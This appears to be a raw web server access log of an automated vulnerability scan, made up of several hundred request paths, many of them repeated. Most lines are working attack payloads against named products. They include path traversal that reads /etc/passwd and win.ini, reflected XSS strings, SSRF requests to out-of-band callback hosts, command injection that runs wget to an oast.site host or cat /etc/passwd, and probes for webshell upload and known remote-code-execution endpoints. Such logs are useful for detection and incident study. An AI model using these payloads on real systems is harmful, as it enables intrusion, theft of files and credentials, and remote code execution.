/web/wp-admin/admin-ajax.php?action=moove_read_xml
/web/mgmt/shared/authn/login
/web/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/web/mgmt/tm/util/bash
/web/
/web/checkValid
/web/public/css/25Sm05ZXn2Oyb7PLpF6TAIIUuKx.css
/web/ui/vropspluginui/rest/services/getvcdetails
/web/../../../../../../../../../../../../../etc/passwd
/web/te%3Cimg%20src=x%20onerror=alert(42)%3Est
/web/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
/web/wp-admin/admin-ajax.php
/web/api/graphql
/web/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
/web/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/web/Images/Remote?imageUrl=http://c8accf99m8v8l7afta3gcekcczoyyyyry.oast.site
/web/cgi-bin/mainfunction.cgi
/web/plugins/servlet/oauth/users/icon-uri?consumerUri=http://c8accf99m8v8l7afta3gcekcczayyyyrr.oast.site
/web/Items/RemoteSearch/Image?ImageUrl=http://c8accf99m8v8l7afta3gcekcczayyyyrg.oast.site&ProviderName=TheMovieDB
/web/download/index.php?file=../../../../../../../../../etc/passwd
/web/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
/web/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/web/index.php/System/MailConnect/host/c8accf99m8v8l7afta3gcekcczoyyyyrn.oast.site/port/80/secure/
/web/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all
/web/Side.php
/web/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1
/web/CTCWebService/CTCWebServiceBean/ConfigServlet
/web/../../../../../../etc/passwd
/web/./RestAPI/LogonCustomization
/web/wp-content/uploads/workreap-temp/25Sm0KD67eWjLShxroH6wiOuYsp.php
/web/wp-content/uploads/wp-file-manager-pro/fm_backup/
/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8accf99m8v8l7afta3gcekccayyyyyre.oast.site%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8accf99m8v8l7afta3gcekccayyyyyrk.oast.site%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/web/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/?ajax-request=jnews
/web/./RestAPI/LogonCustomization
/web/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/web/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00
/web/rest/issueNav/1/issueTable
/web/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/web/wp-content/plugins/wp-statistics/readme.txt
/web/public/css/25Sm05ZXn2Oyb7PLpF6TAIIUuKx.css
/web/+CSCOE+/saml/sp/acs?tgname=a
/web/analytics/saw.dll?bieehome&startPage=1
/web/wp-admin/admin-ajax.php
/web/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
/web/webtools/control/xmlrpc
/web/plugins/servlet/oauth/users/icon-uri?consumerUri=http://c8accf99m8v8l7afta3gcekcczayyyyrr.oast.site
/web/Items/RemoteSearch/Image?ImageUrl=http://c8accf99m8v8l7afta3gcekcczayyyyrg.oast.site&ProviderName=TheMovieDB
/web/maint/index.php?packages
/web/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
/web/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all
/web/admin/auth/reset-password
/web/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english
/web/wp-content/uploads/wp-file-manager-pro/fm_backup/
/web/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/web/var
/web/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)
/web/objects/nuclei.txt
/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8accf99m8v8l7afta3gcekccayyyyyre.oast.site%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8accf99m8v8l7afta3gcekccayyyyyrk.oast.site%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/web/assets/file:%2f%2f/etc/passwd
/web/CTCWebService/CTCWebServiceBean/ConfigServlet
/web/./RestAPI/LogonCustomization
/web/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/web/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00
/web/rest/issueNav/1/issueTable
/web/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences
/web/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/web/wp-content/plugins/wp-statistics/readme.txt
/web/analytics/saw.dll?bieehome&startPage=1
/web/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/web/osm/REGISTER.cmd
/web/CMSPages/GetDocLink.ashx?link=https://example.com/
/web/admin/auth/reset-password
/web/osm_tiles/REGISTER.cmd
/web/./RestAPI/Connection
/web/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences
/web/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
/web/login
/web/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/web/+CSCOE+/saml/sp/acs?tgname=a
/web/webtools/control/xmlrpc
/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c8accf99m8v8l7afta3gcekccaoyyyyrq.oast.site%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c8accf99m8v8l7afta3gcekccaoyyyyro.oast.site%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/web/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/web/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
/web/var
/web/wp-content/plugins/w3-total-cache/pub/sns.php
/web/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots
/web/
/web/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/web/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
/web/proxy.stream?origin=http://burpcollaborator.net/
/web/druid/indexer/v1/sampler?for=connect
/web/
/web/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/web/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
/web/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com
/web/images/..%2finfo.html
/web/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/web/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/web/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E
/web/wp-admin/admin-ajax.php
/web/osm_tiles/REGISTER.cmd
/web/
/web/filemanager/upload.php
/web/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/web/AvalancheWeb/image?imageFilePath=C:/windows/win.ini
/web/25Sm05x7FxISTY2sbOB8IrvNrPM.php%5Cx0A
/web/./RestAPI/Connection
/web/storfs-asup
/web/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
/web/help/admin-guide/test.jsp
/web/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/web/api/settings/values
/web/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
/web/SDK/webLanguage
/web/contrib/acog/print_form.php?formname=../../../etc/passwd%00
/web/login
/web/x
/web/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/web/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=25Sm0Bfi5PSwbQLsLxTSldP8dLN.php&target=l1_Lw
/web/wp-content/plugins/w3-total-cache/pub/sns.php
/web/users/sign_in
/web/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/web/search/
/web/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
/web/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
/web/proxy.stream?origin=http://burpcollaborator.net/
/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/web/druid/indexer/v1/sampler?for=connect
/web/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00
/web/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/web/graph_realtime.php?action=init
/web/s/25Sm0HPLFtgyuODg2R4g7KzpZrq/_/;/WEB-INF/web.xml
/web/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
/web/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
/web/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/web/wp-content/plugins/insert-php/readme.txt
/web/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
/web/images/..%2finfo.html
/web/.../.../.../.../.../.../.../.../.../windows/win.ini
/web/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
/web/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E
/web/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
/web/wp-admin/admin-ajax.php
/web/?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22
/web/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
/web/filemanager/upload.php
/web/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/web/status.htm
/web/updating.jsp?url=https://example.com/
/web/RPC2
/web/ghost/preview
/web/help/admin-guide/test.jsp
/web/?c=../../../../../../etc/passwd%00
/web/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/web/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/web/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
/web/contrib/acog/print_form.php?formname=../../../etc/passwd%00
/web/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00
/web/x
/web/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=25Sm0Bfi5PSwbQLsLxTSldP8dLN.php&target=l1_Lw
/web/ads/www/delivery/lg.php?dest=http://example.com
/web/search/
/web/users/sign_in
/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/web/menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo
/web/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
/web/adserve/www/delivery/lg.php?dest=http://example.com
/web/login
/web/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
/web/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/RPC2_Login
/web/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00
/web/ebook/bookPerPub.php?pubid=4'
/web/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/auth/check
/web/graph_realtime.php?action=init
/web/s/25Sm0HPLFtgyuODg2R4g7KzpZrq/_/;/WEB-INF/web.xml
/web/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/web/wp-content/plugins/insert-php/readme.txt
/web/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
/web/.../.../.../.../.../.../.../.../.../windows/win.ini
/web/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
/web/pages/createpage-entervariables.action?SpaceKey=x
/apisix/admin/migrate/export
/web/RPC2
/web/ghost/preview
/web/share/page/dologin
/web/RPC2_Login
/web/invoker/EJBInvokerServlet/
/web/adserve/www/delivery/lg.php?dest=http://example.com
/web/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
/web/ebook/bookPerPub.php?pubid=4'
/web/api/users
/web/website/blog/
/web/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00
/web/login
/web/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E
/web/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
/web/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/web/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/auth/check
/web/adserver/www/delivery/lg.php?dest=http://example.com
/web/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/run
/web/prweb/PRAuth/app/default/
/web/password.jsn
/web/ReportServer/Pages/ReportViewer.aspx
/web/pages/createpage-entervariables.action?SpaceKey=x
/web/openx/www/delivery/lg.php?dest=http://example.com
/web/api/v1/method.callAnon/sendForgotPasswordEmail
/web/settings.php
/web/secure/ManageFilters.jspa?filter=popular&filterView=popular
/web/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
/web/pages/createpage-entervariables.action
/web/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
/web/timesheet/login.php
/web/
/web/auth/logout?continue=//example.com
/web/revive/www/delivery/lg.php?dest=http://example.com
/web/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
/web/public/login.htm?type=probes
/web/login?redir=http://www.example.com
/web/api/users
/web/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00
/web/share/page/dologin
/web/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
/web/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image
/web/dumpmdm.cmd
/web/invoker/EJBInvokerServlet/
/web/website/blog/
/web/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E
/web/
/web/_search
/web/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css
/web/
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/tmui/locallb/workspace/fileSave.jsp
/web/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
/web/aj.html?a=devi
/web/ReportServer/Pages/ReportViewer.aspx
/web/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00
/web/api/v1/method.callAnon/sendForgotPasswordEmail
/web/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
/web/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/web/settings.php
/web/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://
/web/pages/createpage-entervariables.action
/web/confluence/pages/createpage-entervariables.action?SpaceKey=x
/web/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
/web/auth/logout?continue=//example.com
/web/
/web/tools.cgi
/web/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
/web/revive/www/delivery/lg.php?dest=http://example.com
/web/login?redir=http://www.example.com
/web/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00
/web/public/login.htm?type=probes
/web/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
/web/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image
/web/wp-admin/index.php
/web/dumpmdm.cmd
/web/cgi-bin/file_transfer.cgi
/web/cgi-bin/mt/mt-xmlrpc.cgi
/web/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image
/web/_search
/web/public/login.htm?type=requests
/web/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2
/web/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22
/web/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net
/web/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css
/web/www/delivery/lg.php?dest=http://example.com
/web/?layout=/etc/passwd
/web/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css
/web/console/login/LoginForm.jsp
/web/webEdition/showTempFile.php?file=../../../../etc/passwd
/web/
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
/web/aj.html?a=devi
/web/auth/requestreset
/web/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
/web/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/web/s/25Sm0Ere7DpsOTEWFwAMW7gmRfC/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f
/web/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://
/web/confluence/pages/createpage-entervariables.action?SpaceKey=x
/web/src/redirect.php?plugins[]=../../../../etc/passwd%00
/web/confluence/pages/createpage-entervariables.action
/web/tools.cgi
/web/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
/web/tools.cgi
/web/wp-admin/index.php
/web/cgi-bin/mt/mt-xmlrpc.cgi
/web/cgi-bin/file_transfer.cgi
/web/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image
/web/web/v1/kv/25Sm0FlRdZZkzrtM4sN7jmxKBVH
/web/api/v4/ci/lint?include_merged_yaml=true
/web/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2
/web/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4
/web/public/login.htm?type=requests
/web/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/web/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net
/web/search.php?search=%22;wget+http%3A%2F%2Fc8accf99m8v8l7afta3gcekcc4eyyyyfc.oast.site%27;%22
/web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/www/delivery/lg.php?dest=http://example.com
/web/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css
/web/rest/api/2/user/picker?query=
/web/carbon/generic/save_artifact_ajaxprocessor.jsp
/web/console/login/LoginForm.jsp
/web/_snapshot/test
/web/struts2-rest-showcase/orders/3
/web/
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/auth/requestreset
/web/web/cobbler_api
/web/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
/web/s/25Sm0Ere7DpsOTEWFwAMW7gmRfC/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f
/web/s/25Sm0Ere7DpsOTEWFwAMW7gmRfC/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00
/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd
/web/wp-admin/admin-ajax.php
